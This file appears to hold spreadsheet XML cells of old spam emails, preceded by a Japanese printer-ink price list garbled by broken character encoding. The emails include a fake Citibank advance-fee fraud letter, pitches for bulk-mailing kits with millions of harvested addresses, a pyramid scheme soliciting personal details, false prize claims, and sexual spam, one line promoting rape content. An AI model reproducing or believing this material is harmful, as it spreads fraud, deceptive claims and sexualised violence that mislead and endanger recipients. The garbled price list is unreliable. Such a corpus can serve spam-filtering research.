ï¿½iS020189 ï¿½ï¿½ï¿½ï¿½ï¿½jEpson Stylus Color 740/860/1160  Stylus Scan 2000/2500 ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½170 ï¿½ï¿½ï¿½n
ï¿½iS020191 ï¿½mï¿½ï¿½ï¿½jEpson Stylus Color 440/460/640/660/670/740/860/1160  Epson Stylus Scan 2000/2500 ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½190 ï¿½ï¿½ï¿½n
ï¿½iS020193 ï¿½mï¿½ï¿½ï¿½jEpson Stylus Photo 720/750/EX3 ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½190 ï¿½ï¿½ï¿½n
ï¿½iT003 ï¿½ï¿½ï¿½ï¿½ï¿½jEpson Stylus Color 900/980 ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½250 ï¿½ï¿½ï¿½n
ï¿½iT005 ï¿½mï¿½ï¿½ï¿½jEpson Stylus Color 900/980 ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½350 ï¿½ï¿½ï¿½n
ï¿½iT013 ï¿½ï¿½ï¿½ï¿½ï¿½jEpson Stylus Color 480/580/C20/C20SX/C20U ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½170 ï¿½ï¿½ï¿½n
ï¿½iT014 ï¿½mï¿½ï¿½ï¿½jEpson Stylus Color 480/580/C20/C20SX/C20U ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½190 ï¿½ï¿½ï¿½n
ï¿½iT019 ï¿½ï¿½ï¿½ï¿½ï¿½jEpson Stylus 880/880i ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½500 ï¿½ï¿½ï¿½n
ï¿½iT020 ï¿½mï¿½ï¿½ï¿½jEpson Stylus 880/880i ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½450 ï¿½ï¿½ï¿½n
ï¿½iT017 ï¿½ï¿½ï¿½ï¿½ï¿½jColor 680/685/777(ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½) ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½350 ï¿½ï¿½ï¿½n
ï¿½iT018 ï¿½mï¿½ï¿½ï¿½jColor 680/685/777(ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½) ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½350 ï¿½ï¿½ï¿½n
ï¿½iT028 ï¿½ï¿½ï¿½ï¿½ï¿½jColor C60SU (ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½) ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½350 ï¿½ï¿½ï¿½n
ï¿½iT029 ï¿½mï¿½ï¿½ï¿½jColor C60SU (ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½) ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½350 ï¿½ï¿½ï¿½n
ï¿½iT007 ï¿½ï¿½ï¿½ï¿½ï¿½jPhoto 780/785/790/870,875DC/890/895/1270/1280/1290(ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½) ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½350 ï¿½ï¿½ï¿½n
ï¿½iT008 ï¿½mï¿½ï¿½ï¿½jPhoto 780/785/790/870,875DC/890/895/1270/1280/1290(ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½) ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½350 ï¿½ï¿½ï¿½n
ï¿½iT009 ï¿½mï¿½ï¿½ï¿½jPhoto 1270/1280/1290(ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½) ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½450 ï¿½ï¿½ï¿½n
ï¿½iT0010 ï¿½mï¿½ï¿½ï¿½jPhoto 1200(ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½) ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½400 ï¿½ï¿½ï¿½n
HP ï¿½tï¿½C  ï¿½ï¿½ï¿½ï¿½ï¿½X 
ï¿½iHP51625A ï¿½mï¿½ï¿½ï¿½jDJ-200/200/320/340/400/420/500/540/550/560/505/560DeskWriter C/CK/320/540/550C/560C ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½650 ï¿½ï¿½ï¿½n
ï¿½iHP51626A ï¿½ï¿½ï¿½ï¿½ï¿½jDJ-400/420/500/500/505/505/520/540/550/560/500/505/560 ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½550 ï¿½ï¿½ï¿½n
ï¿½iHP51629A ï¿½ï¿½ï¿½ï¿½ï¿½jDJ-600/660C/670C/690C/695C//OJ-590/630/635/710/725 ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½550 ï¿½ï¿½ï¿½n
ï¿½iHP51645A ï¿½ï¿½ï¿½ï¿½ï¿½jDJ-710/720/820/830/850/870/880/890/895/930/950/970/990/1000/1120/1120/1225/1600/1600/Photo Smart P1000/P1100/DesignJet 750C/750C PLUS/755CM/OfficeJet G55/G85/G95/R45/R65/T45/T65 OfficeJet PRO 1150C/1170C/1175C/Colour Copier 170 ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½550 ï¿½ï¿½ï¿½n
ï¿½iHP51649A ï¿½mï¿½ï¿½ï¿½jDJ-350I/600/610/640/660/670/690/692/694/695/695/Office Jet 590/630/635/725 ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½650 ï¿½ï¿½ï¿½n
ï¿½iHPC1823D ï¿½mï¿½ï¿½ï¿½jDJ-710C/720C/810C/830C/840/842/880C/890C/895CXI/1120C/1125C ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½700 ï¿½ï¿½ï¿½n
ï¿½iHPC6578D ï¿½mï¿½ï¿½ï¿½jDJ-920C/930C/950C/970CXI/990/1220C/Photo Smart P1000 ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½700 ï¿½ï¿½ï¿½n
ï¿½iHPC6614A ï¿½ï¿½ï¿½ï¿½ï¿½jDJ-610/640 ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½550 ï¿½ï¿½ï¿½n
ï¿½iHPC6615A ï¿½ï¿½ï¿½ï¿½ï¿½jDJ-810C/840C/920C ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½550 ï¿½ï¿½ï¿½n
ï¿½iHPC6625A ï¿½mï¿½ï¿½ï¿½jDJ-840C ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½700 ï¿½ï¿½ï¿½n
EPSON ï¿½tï¿½C  ï¿½ï¿½ï¿½ï¿½ï¿½X
ï¿½iS051011 ï¿½jEpson  EPL-5000/5200 ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½2,665  ï¿½ï¿½ï¿½n
ï¿½iS051016 ï¿½jEpson  EPL-5600 ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½ 2,665 ï¿½ï¿½ï¿½n
ï¿½iS051020 ï¿½jEpson  EPL-3000 ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½2,500  ï¿½ï¿½ï¿½n
ï¿½iS050005 ï¿½jEpson  EPL-5500 ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½1,550  ï¿½ï¿½ï¿½n
ï¿½iS050010 ï¿½jEpson  EPL-5700/5800 ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½ 1,750 ï¿½ï¿½ï¿½n
ï¿½iS051035 ï¿½jEpson  EPL-N2000C ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½ 3,500 ï¿½ï¿½ï¿½n
ï¿½iS051022 ï¿½jEpson  EPL-9000C ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½ 3,600 ï¿½ï¿½ï¿½n
ï¿½iS051069 ï¿½jEpson  EPL-N2010 ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½ 2,750 ï¿½ï¿½ï¿½n
HP ï¿½tï¿½C  ï¿½ï¿½ï¿½ï¿½ï¿½X
ï¿½iHP-92274A ï¿½jLaserJet  4L/4P/4MP ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½ 1,700 ï¿½ï¿½ï¿½n
ï¿½iHP-92275A ï¿½jLaserJet  IIP/IIIP ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½ 1,800 ï¿½ï¿½ï¿½n
ï¿½iHP-92291A ï¿½jLaserJet  4SI/IIIS ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½2,200  ï¿½ï¿½ï¿½n
ï¿½iHP-92295A ï¿½jLaserJet  II/IID/IIID ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½ 1,800 ï¿½ï¿½ï¿½n
ï¿½iHP-92298A ï¿½jLaserJet  4/4+/4M/5M ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½ 2,000 ï¿½ï¿½ï¿½n
ï¿½iHP-C3900A ï¿½jLaserJet  4V/4MV/5M ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½ 2,500 ï¿½ï¿½ï¿½n
ï¿½iHP-C3903A ï¿½jLaserJet  5P/5MP/6P ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½ 1,700 ï¿½ï¿½ï¿½n
ï¿½iHP-C3906A ï¿½jLaserJet  5L/6L/3100 ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½ 1,550 ï¿½ï¿½ï¿½n
ï¿½iHP-C3909A ï¿½jLaserJet  5SI/5SIM/8000 ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½ 2,650 ï¿½ï¿½ï¿½n
ï¿½iHP-C4092A ï¿½jLaserJet  1100 ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½ 1,500 ï¿½ï¿½ï¿½n
ï¿½iHP-C4096A ï¿½jLaserJet  2100/2200 ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½ 2,200 ï¿½ï¿½ï¿½n
ï¿½iHP-C4127X ï¿½jLaserJet  4000/T/N/TN ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½ 2,950 ï¿½ï¿½ï¿½n
ï¿½iHP-C4129X ï¿½jLaserJet  5000 ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½3,150  ï¿½ï¿½ï¿½n
ï¿½iHP-C4182X ï¿½jLaserJet  8100/8150 ï¿½mï¿½ï¿½ï¿½oï¿½ï¿½2,550 ï¿½ï¿½ï¿½n-------------------------------------------------------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</si>
  <si>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Removal Instructions:Â Â  This
  message is sent in compliance of the new email bill section 301. Under Bill
  S.1618 TITLE III passed by the 105th U.S.
  Congress. This message cannot be Considered
  Spam as long as we include the way to be removed and the senders info to be
  true and not falsefied. Paragraph (a)(c) of S.1618, further transmissions to
  you by the sender of this email may be stopped at no cost to you by sending a
  request to be removed by clicking HERE
  We honor all remove requests at immediately.
  PLEASE FORGIVE ANY UNWANTED INTRUSION.
shirleanhttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Congratulations! Your mortgagehas been approved. Click HereTo be removed Click here
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,I'm a college dropout.  I work about two hours a day.  
I'm ambitious, but extremely lazy, and I make over 
$250,000 a year.  Are you curious yet?In a minute I'm going to tell you my secret,
it's the dirty little secret of the Internet ...You've probably heard stories about people making
whopping huge money online, but you thought they 
were the big corporate execs, famous programmers, or
boy-geniuses.Well, grasshopper, think again ...It's people like you and me that are making the real
money.  Yep, people like YOU AND ME!Ever since the "dot com bubble" burst in 1999, small-time
entrepreneurs are getting richer while the Fortune 500 
companies look for bankruptcy lawyers.Today small business owners and ordinary folks 
like you and me can use the web to achieve complete 
financial freedom with NO INVESTMENT and very little 
work.  How?  By learning the most profitable marketing 
technique ever created - it's called BULK EMAIL.If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ZERO!Stop paying those outrageous auction listing fees when
hardly anyone sees your ad!Imagine that you have a decent product with a 
profit margin of $20.00 on each sale.  If you send 
an email ad to 500,000 people, and only one person 
in a thousand actually places an order, then you just 
generated 500 orders and made $10,000 in a few hours 
of work.  It's that simple ...All you have to do is convince ONE PERSON OUT OF A
THOUSAND to buy your stuff and you're FILTHY RICH.The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for?!I'm going to ask you four simple questions.  If you answer
YES to all of them, then I can almost promise that you
will make at least $100,000 using bulk email this year.Here goes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grind!All you need is ambition and commitment.  This
is no "get rich quick scheme".  You have to work
to make big bucks, but ANYONE - and I mean ANYONE - can do 
it.You're probably wondering if it's hard to get started.  
Don't worry, it's not! I will show you step-by-step 
how to start your first email campaign and how to
build a booming online business.  You'll be generating 
orders - AND MAKING MONEY - in less than seven days.Okay, so what if you don't have anything to sell?No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...I personally guarantee that you will start your own 
bulk email campaign less than a week after reading 
the Bulkbook!  I'll give you a toll-free phone number 
to reach me 24 hours a day, seven days a week; 
where else will you find that level of service?!I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go.As a special bonus, you'll recieve a FREE copy 
of our STEALTH MASS MAILER, a very powerful bulk 
email program which retails for $49.99! I'll even
include 7 million email addresses absolutely FREE
if you order NOW!Stop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THE BULKBOOK
Teaches you step-by-step how to become a high profit
bulk emailer.  Secret techniques and tips never
before revealed.** SEVEN DAYS TO BULK EMAIL SUCCESS
Provides detailed day-by-day instruction to start sending
your first email campaign in seven days.** 600 Email subjects that PULL LIKE CRAZY** EMAIL LIST MANAGER
Manage your email lists quickly and easily.  Very 
user-friendly, yet powerful, software.** STEALTH MASS MAILER
Software can send up to 50,000 emails an hour automatically.
Just load them in there and click SEND!** ADDRESS ROVER 98 and MACROBOT SEARCH ENGINE ROBOT
Extracts email addresses from databases and search engines
at speeds of over 200,000 per hour.** WORLDCAST EMAIL VERIFIER
Used to verify your email addresses that you extract to 
make sure they're valid.** EBOOK PUBLISHER
Easily publish your own e-books and reports for resale using,
you guessed it, bulk email!** SEVEN MILLION EMAIL ADDRESSES
This huge list will get you started bulking right away.
I harvested these addresses myself, the list is filled
with IMPULSE BUYERS ready to respond to your ads!If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effort?Remember, you will recieve a toll-free phone number
for 24 hour expert advice and consultation FROM ME
PERSONALLY.To order the Bulkbook right now for only $29.99 with 
a Visa or Mastercard, please click on the link below. 
This will take you to our secure server for order 
processing:http://www.2003marketing.com/bulkbook.htmNote: The Bulkbook will be delivered electronically
within 24 hours. It is not available in printed form. You may also pay with cash, check or money
order by printing the order form below and 
sending it with your payment. ------------------------- CUT HERE ----------------------- Product: "The Bulkbook" 
Price: $29.99 HOW TO ORDER BY MAIL: Print out this order 
form and send cash, personal check, money 
order or cashier's check to the address listed below: Internet Products Enterprises Inc.
45 State St. Unit 253
Montpelier, VT 05602Your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 
If paying by credit card, please fill in the information below: Credit Card Number:________________________________ 
Expiration Date:___________________________ 
Signature:_________________________ 
Date:____________________ 
IMPORTANT LEGAL NOTE: There are no criminal laws against
the non-fraudulent sending of unsolicited commercial email 
in the United States.  However, other countries have passed
laws against this form of marketing, so non-US residents 
should check local regulations before ordering. ***********************************************************
Our company is strictly opposed to unsolicited email.
To be removed from this opt-in list, please send a 
request to "bulkexpert@yahoo.com"
***********************************************************
1027zbAU4-744CWZI4637aGiQ5-254sWzM249l35
</t>
  </si>
  <si>
    <t>Hello from BidsToGo.biz
Â 
Hello, 
Privacy policy: To 
      permanently opt out of our mailings simply 
      send a blank email to optout@bidstogo.biz.Â  
  BidsToGo invites you 
visit and exploreÂ 
http://www.bidstogo.biz/, the site 
dedicated to  places to go and
 things to do. You can use
BidsToGo to advertise, sell or auction 
places to go and things to do - and right now it is FREE to make a basic 
listing.
BidsToGo is great for
Â LodgingHotels, bed &amp; breakfasts, resorts, 
      timeshares, vacation rentals, etc.
TravelCruises, yacht charters, rail tours, auto 
      rental, etc.
Vacation packs
    Skiing, outfitters, hunting, fishing, golf, abroad, resorts, 
      etc.
Game tickets
 Football, baseball, basketball, hockey, etc.
Events and Festivals
      Festivals, events, tournaments, races, bowl games, parades, etc.Theme parksDisney World, Busch Gardens, Kings Dominion, 
      Sea World, etc.
ConcertsMusical concerts
TheaterPlays, operas, musicals, etc.
Training
Professional or personal trainingÂ 
Visit http://www.bidstogo.biz/.Â 
Privacy policy: To 
      permanently opt out of our mailings simply 
      send a blank email to optout@bidstogo.biz. 
      Contact
      CustomerService 
      for more information.</t>
  </si>
  <si>
    <t xml:space="preserve">
For your safe drive...and keep your safety with PersonalAlcoholDetector..Removal Instructions are at the end of this letter. Thank youFor your safe drive...and keep your safety with Personal Alcohol Detector..Â 
The key technology for the function and performance of 
Personal Alcohol Detector is the gas sensor. Â We  use Advanced MEMS Gas Sensor
with high accuracy.We are a reliable source of alcohol detectors in Korea
and are lookng
for resellers, distributors to represent this product. If you are interested in dealing
please feel free to contact us.Sincerely Yours,Alcohol org
Inc.Mr.Paul SmithTel : 82-2-459-3123Fax : 82-2-3411-3118***Removal Instructions***We respect your privacy and we want you to be happy. If
you wish to unsubscribe from mailing list please click
here. We will never send you again
and apologize for your inconvenience caused.
</t>
  </si>
  <si>
    <t xml:space="preserve">
Prepaid Legal SpecialHow would you like a Top Rated Law Firm working for you, 
your family and your business for only pennies a day? 
 GET YOUR FREE QUOTE
(Takes only 30 seconds!)
 "Whether it's a simple speeding ticket or an extensive Child 
  Custody Case, we cover all 26 areas of the legal system." 
 Free Court Appearances on Your Behalf 
Unlimited Phone Consultations 
 Review of ALL Your Legal Documents &amp; Contracts 
 Take Care of Credit Problems And that is just the TIP of the iceberg! 
CLICK HERE 
to Get Your FREE Consultation Today  !!</t>
  </si>
  <si>
    <t xml:space="preserve">During these tough economic times, how do you help a salesperson, a customer service representative, or ANY employee improve his or her effectiveness and productivity if you don't know which SPECIFIC skills, habits or attitudes need to be developed or enhanced? To introduce you to our unique training and development resources, we would like to offer you a free preview copy of any one of the following assessments:Professional Selling SkillMapï¿½
Customer Service SkillMapï¿½
Emotional Effectiveness SkillMapï¿½
Team Building SkillMapï¿½
Professional Communication SkillMapï¿½You can visit us online at  www.frontlinelearning.com  for more information, and you can request your free SkillMap preview at:  http://www.frontlinelearning.com/contactus1.htm Please note: If you are NOT responsible for enhancing employee productivity within your organization, please feel free to forward this message to the appropriate individual(s).
REMOVE INSTRUCTIONS: To remove yourself from our mailing list, click reply and type "REMOVE" in the &gt;SUBJECT&lt; Box. </t>
  </si>
  <si>
    <t xml:space="preserve">
a { text-decoration: none; color:#ffcccc }You are just 1 click from The World Of Violence And FORCED SEX
The Brutality Of RAPE!!!CLICK HERE TO SEE
[ CLICK HERE TO UNSUBSCRIBE ]
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
New Page 1
BUY PRODUCTS70 to 80%
BELOW WHOLESALENEW, AND IN QUANTITIES YOU NEED
A SINGLE UNIT, A PALLET,
  OR A TRUCKLOAD1. Do you consider yourself "FINANCIALLY SECURE"?
2. Are you still looking for a very Real Business that can provide you and
  your family with the lifestyle you desire and deserve? Or,just a second
  income in your spare time?3. Would you invest $66.50 (A 25% discount off of our regular price of
  $99.95 during this limited time promotion. ) in a business that could make you
  "FINANCIALLY SECURE"?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afford.Â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"the
  plastic in their wallets determines the quality of their lives."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suppliersÃ¿FFFF92 websites and specials pages, with email
  addresses, phone and fax numbers, and their current HOT
  listings. Unlike othersÃ¿FFFF92 distribution businesses where you are provided with
  WHOLESALE CATALOGS, out of date CD's, or lists of Government Auctions that
  sell Jeeps for $10, (which are a myth), we provide an unlimited virtual
  database of items at up to 95% below wholesale from liquidators, not
  wholesalers, that is up-dated on a weekly/daily basis by the suppliers. And
  the products are available for immediate purchase and shipping to you.
This database is designed for the individual or a small business. Although
  there are suppliers in this database selling in large quantities, most are
  selected for their flexability in being willing sell in small quantities at
  great savings (80 to 95% Below Wholesale)
You will be able to buy such items as RCA Stereos that retail for $250.00+
  for $20.00, New Boom Boxes for $12.50 each, Palm Pilots for $39.00, Cell Phone
  Antenna Boosters that sell on TV for $19.95- - for .16 cents, Perfect Pancake
  makers as seen on TV for $19.95, for$6.50, Disney Kids' clothes at $1.85/unit,
  or Pentium computers for as little as $11.00.Â If you would like to see some sample listings and featured specials,
  please email us adddata7080@excite.comYou may purchase this database:By Credit Card: At PayPal to the account of datapaid2000@yahoo.comBy Phone with Credit Card at 502-741-8154
Check by Fax To:
Specialty Products 502-244-1373(Just write a check and fax it to the above number, NO NEED TO MAIL)(Please include email address for the transmission of database.)By Mail:
Specialty Products
210 Dorshire Court
Louisville, KY 40245(Please remember to include a valid email address for the transmission of
  the Database)Â For your protection, we provide a 30 DAY, 100%
  MONEY BACK, SATISFACTION GUARANTEE, if we have misrepresented our
  product.
What do you get for your $66.50 investment:
A, fully executable, database of 100Ã¿FFFF92s of suppliers with hyperlinks to
  their websites, fax and phone numbers and a description of what type of
  product they handle and current product specials.And, "On-going telephone support during normal business hours."Â Since this is such a fast changing business, with new products being added
  and deleted on a weekly or even a daily basis, all data will be provided
  within 24 hours of receipt of payment via email file transfer. ( no waiting or
  shipping and handling costs) The $66.50 is your total
  one time cost.
This DATABASE is for individuals who recognize an opportunity to make a
  substantial income. Keep in mind, everyone likes a bargain, and even more so
  when the economy is down. So, even if you just want to buy for your own use, a
  single purchase could repay your initial investment. And, remember we provide
  a 30day, full refund satisfaction guarantee.
We know that this has been a brief description, and you may want
  additional information. You may email us at adddata7080@excite.com
  for additional information and a sample of listings currently being offered by
  various suppliers. (If you give us some idea of what
  types of products interest you, we will try to include some sample listings of
  those products.)We look forward to being of service in your new venture.
Specialty Products
takeoffemaildatabaseclickhere
</t>
  </si>
  <si>
    <t xml:space="preserve">You're 
  Bahama Bound! Dear rsharp2, 
Congratulations youâ€™re 
  a winner! 
Youâ€™ve won a chance 
  to receive an all expense paid Florida Vacation. 
  The grand prize will included 5 days and 4 night in Magical Orlando, Florida
  at a world class resort.
But wait there's more! 
  You'll also receive a 3 day 2 night round trip cruise to the Bahamas
  with all of your meals and entertainment included aboard the ship. 
You'll also receive a 3 
  day 2 night weekend getaway for 2 in any one of 32
destinations around 
  the world. Youâ€™ll really enjoy your weekend getaway because
  you can take it any time in the next 18 months. 
To enter to win your prize 
  just come to our website and register. 
Click here
Thanks for entering our 
  contest and we look forward to seeing you soon. 
Sincerely, 
Emily Rodriguez
P.S. Youâ€™ve got to 
  hurry. If you claim your weekend getaway in 24 hours
  you will also be entered to receive 2 round trip airline tickets.
 So donâ€™t wait, 
  Click here today. 
  To be excluded from future prizes Click 
  here
</t>
  </si>
  <si>
    <t xml:space="preserve">Untitled DocumentThis is what are customers are sayingâ€œI was shocked. I can't believe how low the prices are, and the quality of the product is great. I will recommend your site  to everyone I know.â€ 
----------------------------------------------
"
Cartridges were half of my lowest discount store prices. Delivery was in about 3-5  days.
Cartridges work perfectly, so far. I will definitely order againâ€   ------------------------------------------------------------
â€œThe Product is excellent. Ink refill kits, easy to use and saving is substantial!â€  â€œMy order came within three days - much faster than I expected. Definite savings over staples."
------------------------------------------------------------
"Cheaper than any place else in town. Why buy new cartridges when you can get perfectly good results with refills for about 20% of original cost.â€  
Savings are real. CLICK HERE
To be removed from our mailing list click on the link below  and you will be removed from future mailings click here.
</t>
  </si>
  <si>
    <t xml:space="preserve">You are receiving this because we have 
exchanged e-mails
in
the past or your e-mail address is on file. If you wish to be 
removed,
removal
instructions are at the end of this message.Yes, that's right! We guarantee you a
check!Hello, this is
SteveÂ inÂ Georgia, USA. I hope this email finds you and 
yours in
good
health.I have something for you to read that will interest 
you! Thank
You
for your time.Answer six 
simple
questions and we guarantee you a check!Â 
1Â Â Â  Â Â Â  Your
name2Â Â Â  Â Â Â  
phone3Â Â Â 
Â Â Â  email4Â Â Â  
Â Â Â  time you
can
be reached5Â Â Â  Â Â Â  Do you have 
10 hours
per
week to work?6Â Â Â  Â Â Â  How much 
do you
desire
to earn per
month?Â Â Â Â Â Â Â Â Â Â Â 
Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â 
Send Your Info To:Â earn_1000_per_week@btamail.net.cn
TYPEÂ Â  "$1000" as your subject
please!
Â 
A successful friend of mine called to inform me 
thatÂ an
exclusive
recruiting software called The A-B-C Wealth Building
SystemÂ would revolutionize networking as we now 
know it.Â 
He
asked me to simply reply with the answers to the SIX simple 
questions and
they
would set up an Internet Business for me for 
FREE,Â it would
cost me
zero to do it AND they guaranteed me a check before I spent a 
dime!
I
am glad I trusted him because I would normally ignore a pitch 
like that
cause
its sounded to good to be true. I appeased him and replied with 
the answers
to
the SIX simple questions, then they set up my business for me 
fro
FREE!I
am grateful I did! I now have over 120 folks in my powerline in 
less than a
week
and growing like crazy. They were recruited and placed there by 
this new
software and the A-B-C Team. It blew my mind and I've already 
made money
without
doing anything. Replying withÂ my infoÂ was all it took; 
see for
yourself. Your PowerLine will grow like MAD! You can bet I will 
learn even
more
about The A-B-C Wealth Building SystemÂ . This incredible 
software has
only
been in use forÂ 6 weeks!This is by far the best 
system I
have
seen in 12 years in this business!Now even those who have 
never made
money
before ARE!Now that I've done my part by alerting 
you to this
awesome opportunity, the rest is up to you. You owe it to 
yourself to
reply with the answers to the SIX simple 
question, let them
set
up your Internet Business for FREE and see what happens 
REGARDLESS OF WHAT
PROGRAM YOU'RE PRESENTLY WORKING.NOTE: The first in gets the most spill in a 
Powerline.
Powerline means one under the other down one line. So if 100 
people join
from
this email and you are first, you will have 99 
people in
your
powerline, if your the 50th you will have 49,if your the 90th 
you will have
10.
So on and so on!So needless to say go fast, 
reply right now,
Â get your free spot in the powerline and let this 
system go to
work for you like it is has been doing for all of 
us!
FOLKS THIS SYSTEM WORKS LIKE A CHARM AND 
COSTS NOTHING SO
PUT
IT TO THE TEST!TRY IT AND YOU WILL BE AMAZED! I 
SURE
AM!Answer six 
simple questions
and
we guarantee you a check!Â 
1Â Â Â  Â Â Â  Your
name2Â Â Â  Â Â Â  
phone3Â Â Â 
Â Â Â  email4Â Â Â  
Â Â Â  time you
can
be reached5Â Â Â  Â Â Â  Do you have 
10 hours
per
week to work?6Â Â Â  Â Â Â  How much 
do you
desire
to earn per
month?Â Â Â Â Â Â Â Â Â Â Â 
Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Send Your Info 
To:Â 
earn_1000_per_week@btamail.net.cn
TYPEÂ Â 
"$1000" as your subject
please!Â Â The
Success Team 2002
Regards,Steve Ga, 
USA
Â 
RemovalÂ Â Further 
transmissions to you
by
the sender of this 
email
may be 
stopped at no cost
to
you by sending 
a blank email
with
"removeplease"Â in
the subjectÂ to
removeplease@excite.comÂ .Â  We honor all remove requests
at once. </t>
  </si>
  <si>
    <t xml:space="preserve">Dear Dr. Schaefer:I would greatly appreciate a reprint of your article entitledwhich appeared in Sincerely Yours,
 message: this girls pussy is so wet...she squirts!!http://webcamzz.dr.aggo here to watch her webcam!her name is Ginger-------------------------------------------------------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</si>
  <si>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Urgent Concern Pls.I am a serious officer with one of our main branches of CITI BANK,
consumer Banking Department. Although we didn't have previous correspondence till date.
However, based on the standard value place on everything about you,  I believed we could discuss, analyze and execute this transaction.The transaction is thus:
I've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attack,and the funds in his current account has  been claimed by his family, who had gone back finally to USA.
At the end of Fiscal year, March 2001, an  accumulated share of US$12.360M was transferred into his account from the Stock Exchange.
This was alone the instructions we issued to the Stock House to dispose all his stocks.Now the funds has arrived, I needed an associate whom I would present as the inheritor of this fund i.e. Associate partner of Mr. David Brown so as to receive this fund.
Please note, his family has left since,and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guided.Thanking you .Yours sincerely,Dave Framo.
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">To: yyyy@netnoteinc.com
############################################
#                                          #
#       Adult Online Super Store           #
#              Shhhhhh...                  #
#     You just found the Internet's        #
#          BEST KEPT SECRET!!!             #
#    3 Vivid DVDs Absolutely FREE!!!       #
#                                          #
############################################If you haven't seen it yet... we are offering a
new weekly selection absolutely FREE Adult DVDs
AND VIDEOS NO PURCHASE NECESSARY!!!!! GO TO: http://209.203.162.20/8230/Everything must go!!! Additional Titles as
low as $6.97&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;NO PURCHASE NECESSARY! &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;############################################
#                                          #
#  Don't forget to forward this email to   #
#  all your friends for the same deal...   #
#  There is a new free DVD and VHS video   #
#  available every week for your viewing   #
#  pleasure.                               #
#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removal.This e-mail is sent in compliance with the Information Exchange Promotion 
and Privacy Protection Act. section 50 marked as 'Advertisement' with valid 
'removal' instruction.axnaefpgdoyeffbpbfq
</t>
  </si>
  <si>
    <t>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Click Herephillipm</t>
  </si>
  <si>
    <t>Dear Consumers, Increase your Business Sales! How??By targeting millions of buyers via e-mail !! 25 MILLION EMAILS + Bulk Mailing Software For Only $150.00super low price! ACT NOW !!!Our Fresh Addresses Will Bring You Incredible Results!If you REALLY want to get the word out regardingyour services or products, Bulk Email is the BEST way to do so, PERIOD! Advertising in newsgroups is good but you're competing with hundreds even THOUSANDSof other ads. Will your customer's see YOUR ad in the midst of all the others?Free Classifieds? (Don't work)Web Site? (Takes thousands of visitors)Banners? (Expensive and iffy)E-Zine? (They better have a huge list)Search Engines? (Easily buried with thousands of others)Bulk Email will allow you to DIRECTLY contact yourpotential customers. They are much more likely totake the time to read about what you have to offer if it was as easy as reading it via email ratherthan searching through countless postings in newsgroups.The list's are divided into groups and are compressed. This will allow you to use the names right off the cd. ORDER IN THE NEXT 72 hours AND RECIEVE 4 BONUSES!!ORDER IN THE NEXT 48 HOURS AND RECIEVE FULL TECHNICAL SUPPORT !!!ACT NOW !!!!!!!!!!!!!!*BONUS #1 Receive an additional cd-rom with millions of fresh, deliverable general internet e-mail addresses free!! *BONUS #2 Receive 2000 how to books, reports and manuals on cd-rom withreprint resale rights! Produce for pennies and resell for BIG dollars! *BONUS #3 Receive the Mass Mailer bulk delivery software, with fulloperating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$150.00ORDERING INFORMATION:CHECK BY FAX SERVICES OR CREDIT CARD INFO: O R D E R N O W . . . SAME DAY SERVICE (M-F) if your orderis received before 3pm Central . To place an order, you can call us at: 